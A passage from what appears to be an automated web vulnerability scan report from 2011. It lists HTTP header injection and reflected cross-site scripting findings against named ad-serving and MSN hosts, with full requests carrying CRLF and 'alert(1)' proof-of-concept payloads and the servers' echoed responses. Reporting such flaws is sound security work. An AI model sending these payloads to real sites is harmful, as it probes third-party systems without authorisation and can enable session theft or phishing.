/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


4.10. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 91fa6%0d%0ae13b060d036 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /bserver/AAMALL/91fa6%0d%0ae13b060d036=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:57 GMT
X-DirectServer: whitepg_DS3
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/91fa6
e13b060d036
=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link


4.11. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 29f59%0d%0a7bcc5cf3004 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link?29f59%0d%0a7bcc5cf3004=1 HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:40 GMT
X-DirectServer: whitepg_DS0
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link?29f59
7bcc5cf3004
=1


4.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 130f0%0d%0a954906be907 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0130f0%0d%0a954906be907; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0130f0
954906be907
; expires=Sat, 30-Apr-2011 09: 50:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEaciK0c9M00001; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 14:50:01 GMT
Connection: close
Content-Length: 2205

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

4.13. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 3ea58%0d%0a723dce477a3 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=3ea58%0d%0a723dce477a3&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:3ea58
723dce477a3
;expires=Sun, 30 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=254
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:30 GMT
Connection: close
Content-Length: 2372

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',3ea58
72
...[SNIP]...

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload c4bae%0d%0aa72d820a2b6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=c4bae%0d%0aa72d820a2b6&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1394:c4bae
a72d820a2b6
;expires=Sun, 30 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:43 GMT
Connection: close
Content-Length: 3384

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',c4bae
a72d
...[SNIP]...

4.15. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ae1b%0d%0a33d8416c84 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /home.asp?4ae1b%0d%0a33d8416c84=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:15:43 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//?4ae1b
33d8416c84
=1
Content-Length: 74

object moved <a href="http://money.msn.com//?4ae1b
33d8416c84=1">here</a>

4.16. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2d5ca%0d%0acb9513cea6b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /investor/home.aspx?2d5ca%0d%0acb9513cea6b=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:19 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?2d5ca
cb9513cea6b
=1
Content-Length: 83

object moved <a href="http://money.msn.com/investing?2d5ca
cb9513cea6b=1">here</a>

5. Cross-site scripting (reflected)
There are 362 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b670c"-alert(1)-"6e98b65d01c was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
dn.net/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/2
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b87f"-alert(1)-"c630857e2e5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
0_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 601ea"-alert(1)-"ea0886cce92 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:41:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5959

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
"250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e47"-alert(1)-"5c12fb84d15 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

